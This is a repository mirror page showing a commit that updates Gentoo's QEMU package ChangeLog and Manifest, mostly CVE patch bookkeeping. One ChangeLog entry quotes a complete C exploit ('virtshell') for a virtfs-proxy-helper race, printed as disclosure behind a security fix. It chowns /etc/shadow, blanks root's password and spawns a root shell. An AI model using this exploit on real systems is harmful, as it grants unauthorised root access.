mirrors/flatcar-scripts
1
0
Fork 0
mirror of https://github.com/flatcar/scripts.git synced 2025-08-19 05:21:23 +02:00
Code Issues Packages Projects Releases Wiki Activity

bump(app-emulation/qemu): sync with upstream

Browse Source
This commit is contained in:
Nick Owens 2016-04-01 12:45:52 -07:00
parent eb5e6a6640
commit 7b807b21c7
77 changed files with 2464 additions and 4933 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

374
sdk_container/src/third_party/portage-stable/app-emulation/qemu/ChangeLog vendored
View File

@ -1,5 +1,5 @@
# ChangeLog for app-emulation/qemu # ChangeLog for app-emulation/qemu
# Copyright 1999-2015 Gentoo Foundation; Distributed under the GPL v2 # Copyright 1999-2016 Gentoo Foundation; Distributed under the GPL v2
# (auto-generated from git log) # (auto-generated from git log)
*qemu-9999 (09 Aug 2015) *qemu-9999 (09 Aug 2015)
@ -239,3 +239,375 @@
qemu-9999.ebuild: qemu-9999.ebuild:
force C locale for sorting to workaround glibc bug #564936 force C locale for sorting to workaround glibc bug #564936
23 Nov 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-cflags.patch, qemu-9999.ebuild:
update cflags patch #565866
07 Dec 2015; Doug Goldstein <cardoe@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-9999.ebuild:
utilize xen-tools sub-slot
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.4.1-r1 (08 Dec 2015)
08 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7504.patch,
+files/qemu-2.4.1-CVE-2015-7512.patch,
+files/qemu-2.4.1-CVE-2015-8345.patch, +qemu-2.4.1-r1.ebuild:
add upstream security fixes #566792 #567144
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> metadata.xml,
qemu-9999.ebuild:
add USE=virgl for Virgil 3d GPU #566994
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
switch to new libcacard release #561814
*qemu-2.4.0.1-r2 (14 Dec 2015)
*qemu-2.4.0-r2 (14 Dec 2015)
*qemu-2.3.1-r1 (14 Dec 2015)
*qemu-2.3.0-r7 (14 Dec 2015)
14 Dec 2015; Jason A. Donenfeld <zx2c4@gentoo.org> +qemu-2.3.0-r7.ebuild,
+qemu-2.3.1-r1.ebuild, +qemu-2.4.0-r2.ebuild, +qemu-2.4.0.1-r2.ebuild:
critical security fix
The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:
~=~=~=~= snip ~=~=~=~=
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Beginning race loop
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper",
"-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock",
NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow >
/tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
15 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-2.4.1-r1.ebuild, qemu-9999.ebuild:
drop virtfs-proxy-helper fcaps from all versions #568226
*qemu-2.4.1-r2 (15 Dec 2015)
15 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7549.patch,
+files/qemu-2.4.1-CVE-2015-8504.patch, +qemu-2.4.1-r2.ebuild:
add upstream fixes for #567828 #568214
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
amd64 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
x86 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
*qemu-2.5.0 (17 Dec 2015)
17 Dec 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.5.0.ebuild:
version bump to 2.5.0
17 Dec 2015; Mike Frysinger <vapier@gentoo.org>
-files/qemu-2.2.1-CVE-2015-1779-1.patch,
-files/qemu-2.2.1-CVE-2015-1779-2.patch,
-files/qemu-2.3.0-CVE-2015-3209.patch,
-files/qemu-2.3.0-CVE-2015-3214.patch,
-files/qemu-2.3.0-CVE-2015-3456.patch,
-files/qemu-2.3.0-CVE-2015-5154-1.patch,
-files/qemu-2.3.0-CVE-2015-5154-2.patch,
-files/qemu-2.3.0-CVE-2015-5154-3.patch,
-files/qemu-2.3.0-CVE-2015-5158.patch,
-files/qemu-2.3.0-CVE-2015-5165-1.patch,
-files/qemu-2.3.0-CVE-2015-5165-2.patch,
-files/qemu-2.3.0-CVE-2015-5165-3.patch,
-files/qemu-2.3.0-CVE-2015-5165-4.patch,
-files/qemu-2.3.0-CVE-2015-5165-5.patch,
-files/qemu-2.3.0-CVE-2015-5165-6.patch,
-files/qemu-2.3.0-CVE-2015-5165-7.patch,
-files/qemu-2.3.0-CVE-2015-5166.patch,
-files/qemu-2.3.0-virtio-serial.patch,
-files/qemu-2.4.0-CVE-2015-5225.patch,
-files/qemu-2.4.0-CVE-2015-6855.patch,
-files/qemu-2.4.0-CVE-2015-7295-1.patch,
-files/qemu-2.4.0-CVE-2015-7295-2.patch,
-files/qemu-2.4.0-CVE-2015-7295-3.patch,
-files/qemu-2.4.0-block-mirror-crash.patch,
-files/qemu-2.4.0-e1000-loop.patch, -qemu-2.3.0-r5.ebuild,
-qemu-2.3.0-r6.ebuild, -qemu-2.3.0-r7.ebuild, -qemu-2.3.1.ebuild,
-qemu-2.3.1-r1.ebuild, -qemu-2.4.0-r1.ebuild, -qemu-2.4.0-r2.ebuild,
-qemu-2.4.0.1.ebuild, -qemu-2.4.0.1-r1.ebuild, -qemu-2.4.0.1-r2.ebuild,
-qemu-2.4.1.ebuild, -qemu-2.4.1-r1.ebuild:
drop versions <2.4.1-r2
20 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0.ebuild,
qemu-9999.ebuild:
disable libgcrypt usage #568856
*qemu-2.5.0-r1 (18 Jan 2016)
18 Jan 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8558.patch,
+files/qemu-2.5.0-CVE-2015-8567.patch,
+files/qemu-2.5.0-CVE-2015-8701.patch,
+files/qemu-2.5.0-CVE-2015-8743.patch,
+files/qemu-2.5.0-CVE-2016-1568.patch, +qemu-2.5.0-r1.ebuild:
add upstream fixes for #567868 #568246 #570110 #570988 #571566
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Replace all herds with appropriate projects (GLEP 67)
Replace all uses of herd with appropriate project maintainers, or no
maintainers in case of herds requested to be disbanded.
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Set appropriate maintainer types in metadata.xml (GLEP 67)
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
amd64 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
x86 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
15 Feb 2016; Doug Goldstein <cardoe@gentoo.org>
-files/qemu-1.7.0-cflags.patch, -files/qemu-2.4-mips-fix-mtc0.patch,
-files/qemu-2.4-mips-fix-rdhwr.patch,
-files/qemu-2.4-mips-move-interrupts-new-func.patch,
-files/qemu-2.4-mips-wake-up-on-irq.patch,
-files/qemu-2.4.1-CVE-2015-7504.patch,
-files/qemu-2.4.1-CVE-2015-7512.patch,
-files/qemu-2.4.1-CVE-2015-7549.patch,
-files/qemu-2.4.1-CVE-2015-8345.patch,
-files/qemu-2.4.1-CVE-2015-8504.patch, -qemu-2.4.1-r2.ebuild,
-qemu-2.5.0.ebuild:
remove vulnerable versions
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
15 Feb 2016; Patrick Lauer <patrick@gentoo.org> metadata.xml:
Remove unneeded useflag description from metadata.xml
Package-Manager: portage-2.2.27
19 Feb 2016; Robin H. Johnson <robbat2@gentoo.org> metadata.xml:
restore USE=gnutls use desc for side-effects
commit ea4d1e1fcc just removed the USE=tls, rather than updating it for
USE=gnutls. Per the description, it has side-effects of enabling
enabling WebSocket & disk quorum features.
Package-Manager: portage-2.2.27
28 Feb 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm64 dependencies
arm/arm64 have some dependencies which are higher than other platforms.
Unfortunately the dependencies are not stable on arm but this package is
so arm updates will come later.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
28 Feb 2016; Matthew Thode <prometheanfire@gentoo.org> qemu-2.5.0-r1.ebuild:
keywording arm64
merged on X-C1
Package-Manager: portage-2.2.26
15 Mar 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm depends for libseccomp
arm needs libseccomp 2.2.3 or newer for QEMU to be able to utilize it.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.5.0-r2 (23 Mar 2016)
23 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8613.patch,
+files/qemu-2.5.0-CVE-2015-8619.patch,
+files/qemu-2.5.0-CVE-2016-1714.patch,
+files/qemu-2.5.0-CVE-2016-1922.patch,
+files/qemu-2.5.0-CVE-2016-1981.patch,
+files/qemu-2.5.0-CVE-2016-2197.patch,
+files/qemu-2.5.0-CVE-2016-2198.patch,
+files/qemu-2.5.0-CVE-2016-2392.patch,
+files/qemu-2.5.0-rng-stack-corrupt-0.patch,
+files/qemu-2.5.0-rng-stack-corrupt-1.patch,
+files/qemu-2.5.0-rng-stack-corrupt-2.patch,
+files/qemu-2.5.0-rng-stack-corrupt-3.patch,
+files/qemu-2.5.0-sysmacros.patch, +files/qemu-2.5.0-usb-ehci-oob.patch,
+files/qemu-2.5.0-usb-ndis-int-overflow.patch, +qemu-2.5.0-r2.ebuild:
backport various upstream fixes
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
amd64 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
x86 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
25 Mar 2016; Sergey Popov <pinkbyte@gentoo.org> -qemu-2.5.0-r1.ebuild:
security cleanup
Gentoo-Bug: 576420
Package-Manager: portage-2.2.28
28 Mar 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-9999.ebuild:
use l10n.eclass to respect LINGUAS #577814
*qemu-2.5.0-r3 (28 Mar 2016)
28 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-9pfs-segfault.patch,
+files/qemu-2.5.0-ne2000-reg-check.patch, +qemu-2.5.0-r3.ebuild:
add few more upstream fixes #573816 #578142
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
amd64 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
x86 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
20 Apr 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r3.ebuild,
qemu-9999.ebuild:
mention /dev/kvm perm updates in the readme/elog #580436
*qemu-2.5.1 (23 Apr 2016)
23 Apr 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.1-CVE-2015-8558.patch,
+files/qemu-2.5.1-CVE-2016-4020.patch,
+files/qemu-2.5.1-stellaris_enet-overflow.patch, +qemu-2.5.1.ebuild:
app-misc/qemu: version bump & bug fixes #579614 #580040 #580426

79
sdk_container/src/third_party/portage-stable/app-emulation/qemu/Manifest vendored
View File

@ -1,49 +1,38 @@
AUX 65-kvm.rules 40 SHA256 c16a8dc7855880b2651f1a3ff488ecc54d4ac1036c71fffd5007021d8d18a7c5 SHA512 98aad2a2f212a7ac0ee5b60a9c92744fa462bce5f26594845c7a31d692aaaca2d52cb57bdbede7dfc60b9862c2a6510665dbb03215d5cf76e62516a283decdd6 WHIRLPOOL 937de93a23930f6b8533f0c3e0dd249c99ddf7d54446dea857607266ac0a4b435c5b4a52b2986b138bace9c0a7ade66f94116b38e2bc4767ead54bd11baf0920 AUX 65-kvm.rules 40 SHA256 c16a8dc7855880b2651f1a3ff488ecc54d4ac1036c71fffd5007021d8d18a7c5 SHA512 98aad2a2f212a7ac0ee5b60a9c92744fa462bce5f26594845c7a31d692aaaca2d52cb57bdbede7dfc60b9862c2a6510665dbb03215d5cf76e62516a283decdd6 WHIRLPOOL 937de93a23930f6b8533f0c3e0dd249c99ddf7d54446dea857607266ac0a4b435c5b4a52b2986b138bace9c0a7ade66f94116b38e2bc4767ead54bd11baf0920
AUX bridge.conf 454 SHA256 a51850dd39923f3482e4c575b48ad9fef9c9ebb2f2176225da399b79ce48c69d SHA512 a907ee86b81a1b61033bb7621ded65112504131ef7b698c53e4014b958ee6fc79e66f63069015a01e41362cb70a7d0ed26dd9a03033cf776f4846f0e1f8f1533 WHIRLPOOL 8fcbd4abf9b8f7ca3d16fe0eaf17196ebf708dfecf85ce0f020e0de22b64905114f7b310f361826c81bb961c6b1bbbf984bff1e595bb949993b8966ccb222c35 AUX bridge.conf 454 SHA256 a51850dd39923f3482e4c575b48ad9fef9c9ebb2f2176225da399b79ce48c69d SHA512 a907ee86b81a1b61033bb7621ded65112504131ef7b698c53e4014b958ee6fc79e66f63069015a01e41362cb70a7d0ed26dd9a03033cf776f4846f0e1f8f1533 WHIRLPOOL 8fcbd4abf9b8f7ca3d16fe0eaf17196ebf708dfecf85ce0f020e0de22b64905114f7b310f361826c81bb961c6b1bbbf984bff1e595bb949993b8966ccb222c35
AUX qemu-1.7.0-cflags.patch 300 SHA256 8f35e55c4bae93e82f9580eabe2d6a2d4660bd05343e1f4e6c33815deeede91e SHA512 54446cb555b623b2306f8a323713e4dfb1b8b7bbf3af3771d5b62e164e0672cc21cbe44f08ca8b58052523e8d629e16355a44ebb544a999a44d11ac3af671f1c WHIRLPOOL b903b4abefeeb09a2ab2d1ee224de5d3694f99f50aacfe33882fce0c1c87c23dae4d57b001d1c35cc96fffa93d43fac4a8ab30a3e45fe1f380580162c0332e78 AUX qemu-2.5.0-9pfs-segfault.patch 1294 SHA256 707835ed8af1aa7e8fc9f0e06c6afa8e77fe7858b20ad4c2df2a1aec0627332d SHA512 2af7498939ba653c36808a7bccafe4a3d8c3d1cfa7199c5788f67fb001925dff17e4faba5e13c6b1517ca887209452f4ba7ed71f6b4464d55b5e942350406f90 WHIRLPOOL 591ba85bd9e5ab0665ed5835878886ec0d774a500ed966dd1b37e5478a4799a38d319a6bb88d214f202a83282db6a0434641b30c8b70ceef6bd2fb1e38f8faef
AUX qemu-2.2.1-CVE-2015-1779-1.patch 8631 SHA256 17ea04bb0571f3a346eb25ce2d61fd7053515767adedfde567fd39205993c600 SHA512 191dde0754b9466d87cf99a578ac07f0902f373156f4d5ff98540b9099a6fa8e29ba4ca9d4a5a21ae5dbba2b80c36600ea0bd2c31fa0c8734926514015166ab8 WHIRLPOOL 2be2f490eb32857b2b218761df3580bc31eb5a89bf1b289a048e9fd489cdb024869399481345b5ecb09a45c4fbf1ee4639062ae1fdbee9781e66ca6cc8af4cac AUX qemu-2.5.0-CVE-2015-8558.patch 1459 SHA256 d769e6eb6dc0bdb0b982ef5fe7d73cc6bad47233102f53d11c6ed6c9051602d8 SHA512 42961191890c500675610d5d33e6ff468b07428c6b428ac01bb5c0e3ea88ff611a3532f848d54317458475fef221a06e41761ef14ea61d1b741db73450c4f90d WHIRLPOOL 475679dc1a24bc75012995a9a2122847454701b65ff0b7f8192865b45de49ce08572f129a7cfdeb36521252ed2f80c95e9dddbd64cb8e39fdc5beacc25934798
AUX qemu-2.2.1-CVE-2015-1779-2.patch 2318 SHA256 4c0966520bf09df25d99c883f94037e765406dd4097dd704e66361bb07f73679 SHA512 7a85bc8e00c60c6c36790d1169f0d84d2c75fe81c1700b4f764ddcb0d0587d4b6d228d80e65fead035e3ab99449aad2f559071edf9145ff7a755506f3ff05b0e WHIRLPOOL 078388c50367d41c810a02aa795b6ad0df381582bdd2725ae125243ee5921aa4057494f063a7de49da6b6f6343f37a3c83d96ef6d92c22e722972c8e4ea968dc AUX qemu-2.5.0-CVE-2015-8567.patch 3108 SHA256 88b72df4e02407c3b9ca4835c38988b97fcd5aa9c68da6fa47207fe675d4e661 SHA512 2f0243ec9764d72fe5e7a005a8db40d3d5c4c2edae5c3451087ee3f5c841c96a3112875cf88a19061fa2ce0d04715d247e6eb1eb83e1e5b57ec0b9eb324b8ce6 WHIRLPOOL b432ff3e105da5c0bd20dd1d7da0374f4005b2ac5a9a8c824e96730aeafa89bb8fc125f8b2857fdaf72024082ddbc0c7a28c3e3ffb9114c3d370db1b638c4731
AUX qemu-2.3.0-CVE-2015-3209.patch 1759 SHA256 0fd6be98beb1f63cd45924c1cdf2a64fc5dca2af5a977c6391aa656433a035e9 SHA512 9ddca8a536f14ecf9f5e15fc65438cce2e02adf92c54cb98f4529934515b0cc159bb41532013d6321590812181f9904d4d8bb761542dc776ff8a724a97bb6f0f WHIRLPOOL f365aab8ed12602c32db7e2c4203d58e4d07dd147d4e2356b92f4124b63fb5f17b0314fc6520c3b7a40786205b671c40ba3fbc4b7e16f8be5e9399bdd5532508 AUX qemu-2.5.0-CVE-2015-8613.patch 1264 SHA256 c8df9bb4c0100ef6c8ae09acd73878e46b3ad4a9e04b9cfe30445922bc33299c SHA512 ea2bf909ec29bab0b2131bf9d3e8fc04f176393258c4ce578d3ac8d76f09a25b96f8a3b2aa450b47c0ba9bc9637e5b93e7cc53542362b48930de18ceebb07698 WHIRLPOOL f0d415b1df9f05cb0431801054535f8939d46e7dda6eaa5ce990eef82ddc458003eb9ae5dc06e3269ddb5ed8f8c903c1f3d058d41e63ea9a5192b6149283feb2
AUX qemu-2.3.0-CVE-2015-3214.patch 1411 SHA256 c0d3f6e17d8b68260486f478dea18fb7869fe4108551fd9093d89be57e2ec360 SHA512 97030b47df828a7377d20a30b29b80c580e3f9b8cfd6632c27637154b6877b27730780cd716ab96f058f1eccaa848c6808959ab8b4949d9cc7440d9e58c78fd5 WHIRLPOOL 7717aaf2e5a468c4b2ba34adee56394aea676d7a7d472fd37e3a6096ef74d2db696d3f5bc7c45cb2879ec4ec4fd2255555ea2ee348b5cd64a80b6c7af6ffdcd8 AUX qemu-2.5.0-CVE-2015-8619.patch 4220 SHA256 325bb3df340a1f5115a345a145bed94e9b2d5721cf8cce1217138e8d5a8a0c1a SHA512 317e882da18332fe667c10c55b8f026d347d93c61f668e8ddb916f1b0f5e39a9e3104c14ab2306ce761024a02a78af3a4808627ad9f18c0d43d748fd30c21505 WHIRLPOOL feddd255cf3844cd270ca2662f6140cc7104f8328e51acb01dc2f6f1b4646061569f5faa629264ebeaa5a2b18e595c4a90b69a588aa05f1acf70d9570067c6c0
AUX qemu-2.3.0-CVE-2015-3456.patch 2853 SHA256 efac61bf9c20d5d08ef47bc9d51be5c8bd519f1d970ba3c3506c5760bf807e7d SHA512 5fed59ae67a962d187418f4bd57cebe901f9bcba817694b5e2a57daf77c34a406ed7c1f278e12d813304e58c48a24493b4e001a9ee4045bab2608f1730715ac7 WHIRLPOOL 9ad5237aa1bbe46a8493e331bb9c2152c36f9c877582485e1cf811b09430bad97a9f3b6bc52face7e4287f9c9fe4f1891de154a62ba93ea454c3ed9d44e8f729 AUX qemu-2.5.0-CVE-2015-8701.patch 1671 SHA256 f39e0c6301cffa1b14c3ef0ab72fce0e2acd42170759ef7954234d31602aeb99 SHA512 d39edf84e2d17e6080bbc4a270732cd73b41fa39d948ee7bc4456e1024c5a69ddfb5e848af3272615f5aa36a3b6410a12f5a73e00ccfa58e0d60d7289d034aa9 WHIRLPOOL 352148c367837ba2d6eb5eb39e00c128f0cff3faef159754a41318857bc11a6616be184c24df4767ec2c8c14910ad74fc3be48273f6312b1687910fbcaf7bec3
AUX qemu-2.3.0-CVE-2015-5154-1.patch 2160 SHA256 3dd3758c0bd8f27a906f2234ecfe270596e48d5c056eab2390b1eab9b610a847 SHA512 63d70d9904922be7f709c0638214ab42ae167b4dd05c0ac35a6de6dbdf81013769ed8733a8f56ce1e108d0759cf485f2199d63b046b526c5a0cec19a41fe41a9 WHIRLPOOL 238d9030c0d0970d22479ca0e1432819785ba1d4961e4d47fcfb63cf9b8a8cff92878509210fd10f3a91d6108f85ed172829234316862016d07533b71da954d2 AUX qemu-2.5.0-CVE-2015-8743.patch 1777 SHA256 22aac571c1aa6f6a283d200a7703fdfea0a5bcaf227a003a2cbf5741bbb8df85 SHA512 65d8632fd43959983ca02f9ab116ec78ea043e6d867e6d743014885c2a423bb3b87c2e56caa37e7f29e971a44f5ea695cb4ce1c3a9c1fc2d734b25ca0b2f4054 WHIRLPOOL 9128c812cfbfe3d4629cd6c7c2c6f50c9ef2fe2d5b62b24486559279296987f593f852f913eb67fbe956d650d50612fa7a658a60b3d80cf4fa9256e332d77330
AUX qemu-2.3.0-CVE-2015-5154-2.patch 817 SHA256 4a3e812dec9bd43d2de2dd88f0adbb2473b785e6a1c3841d889dffad13a65f7a SHA512 0a903ad1e8fb1cac59f26e63d05820cb13cc020ba606a265c0482f1103a737ce0de9cc913ca324422cdda0ebf2b056e20b50951de999325b555031c014eaa597 WHIRLPOOL d697f46bf34e05f98db9e2e3ac05807afec59db5aa4063c76a0171efc4c84073301cec048f75398e210eec698be5d0363cb9c7c36a555cee9616acd21f09446b AUX qemu-2.5.0-CVE-2016-1568.patch 1476 SHA256 ba2a25142977eea531159d81ef8938e8519c92800aa1958e71da9e2780c8256a SHA512 643ef742e6cd1dbc8f420b38f684bc8639e4bd58ab38c254654d4b1a72b129202fecdddddfd308b48ed7813da193edff68d737080d5035c82daf9676ee17df22 WHIRLPOOL af9376400540f20d77ea06cb6a12ce415b72bb22cdde3365bba8b02deb8985aedfee303646e13e1d1263a2dcd17bf1518637183a81c66c2db7b438aa88ef7d95
AUX qemu-2.3.0-CVE-2015-5154-3.patch 2101 SHA256 17999d2e455db848b3e47d146f239104e2e58661f27fc549609bdf6ef77ad8a5 SHA512 0a12a2281b8f6ae787ff8d58437b68df877d02d0ff3d53491a0dbea8c2e656632242de5b2e56b2703f77bfd2b8987c7f312025e27fd8bbb14f159419322d9801 WHIRLPOOL b05f6828dd66b26fad3327c0e795b211f50733857dbf3ac909900321df2cd381fb536c6418510796bafcd38795c7b8ae0729aa51666eaccd0787029987b30e19 AUX qemu-2.5.0-CVE-2016-1714.patch 2168 SHA256 2a366b01f5c05a87324ca765cea90bc93eda819d264932ac4588e6303e0b7dee SHA512 25f5f67dbcb2175bac1b5d6d11bf6b27019526c0ee43ed8580a0de10bf82ac62e5a71ded4d18c0e561d8d3832da630c92f9f118277da349367f55b4939029216 WHIRLPOOL 600d0c90779aaf7c1840e106359c909d486c7cce483edc0e5ddc627a127c907f5dd9cbd5b8ce561e2675f6bfe8cd0502efa96557601ce26eda2311b1072ab48b
AUX qemu-2.3.0-CVE-2015-5158.patch 1302 SHA256 d53b76179ba33a51fbb1b7b2c35b003c63968d0400419c10fa33d353247eccd3 SHA512 8ef6f640ae77d9769fcff92b8c5a6a986ae35021556e594cf4848d1247cbf880e08f661c2734770fb946be8af17a542c3caae36b2b28e3ab58d70a829aa987c2 WHIRLPOOL 69987764ec3bd21bb316310938567a1e4e454a4195b4bede3f34487ee987777510e83cac24b455246d9cde84b16e0ac823dcb0f39e0a97c9a0db2315bc2c6f4d AUX qemu-2.5.0-CVE-2016-1922.patch 2114 SHA256 a10d23d5ff3d021aa0962c79a397b69518cec6cd570ebea771f03513d4b7eb1a SHA512 af895fd14e876f808203279176c5f5c28d95d0137385c6d0e56e27f9ad70b76552b8ce75a3be368ceed94fbc62999e8d6c5e6dbcd35e99d59c57787afe6ac57d WHIRLPOOL 199ec0c9bc766968778e5733e1ca0773999a3cccfa779d8fdf68c2ed866a1427048b0db9730eb2a1521be5e174ea6388b69053c85d0d25144e73df25ec7829a9
AUX qemu-2.3.0-CVE-2015-5165-1.patch 2926 SHA256 12d0dc1a31449288ed5e562a1e9415c437b7a2799e8afa0b251e3957a0d8ab23 SHA512 1df1ff1044542c4a0b040cb7fe5bbe002ee95782277f50f2bea86fbb34d4c5404a6c1f467a4cc224020882fe8c2f113e6b44d762129bd79ae04e139494a90ddc WHIRLPOOL 9a145915030288ab597899d18e8054e6b0c5d9f25fa78ee3e7c99317d91d68ee155f9e16363c8d8f692a97e231394c778fb5fb6c527c9419d0b4b1f79ea7c725 AUX qemu-2.5.0-CVE-2016-1981.patch 4160 SHA256 ad440f4964670e68846a3469e0cb0eca3ecf11cfc5c2e32b09581b64eef43ab7 SHA512 f133a311da42cc831116251550359949e0f23f1163a7b0e638fc5f43edf1dea17a5e5843a06142c3086ef367d94898b074eebf8c371ea83b7a3981cfd20c4e27 WHIRLPOOL ba6e563917773d4488f51c11864a6ce1a4331ba6fc7925f47768282ea75f1a26c51792063c946579d49b28e3ed7a854a191732c1ba7ec40628395e971cf67782
AUX qemu-2.3.0-CVE-2015-5165-2.patch 18212 SHA256 c91a60b7d7e18ea95b31eca0ba940d53c14730fae1e50802375c9e5ab7d0f109 SHA512 eb332382898e0450bc6a6297e5977579a05f7b2ad304659aff37a7eed040b28013a982cdff2a1d669e968cea2aefef183081db1f6f9ae2baf64865ef2dbfa283 WHIRLPOOL c95181f31e8db78432c226a51bb4023da73430ce4de96960448573d3929bdce23b696ba9a6dabc8ccb8fe18e9c07ccf73d646ddccf26b3b0761813fcdef92564 AUX qemu-2.5.0-CVE-2016-2197.patch 1358 SHA256 caa5eb42b21a3fc656982fdc4e511c8350eeb0511857d9b8f371e4e926c2ac80 SHA512 ee6467ef00c5db1e6c5f6331ec411afd139e7e8c5d5e23e3ee33b3161f0e79028ddecfa661bf4bfb5bac0cfa91385f69d66b57c5337384817f0756b7575aa099 WHIRLPOOL 67bab11771159560fd080d157477aa227aa351bb8101671c0e778a38a15d607a2346ade7b10310914f93d5a1faeb993003590e7bf75cd5c9d06db0c687085b51
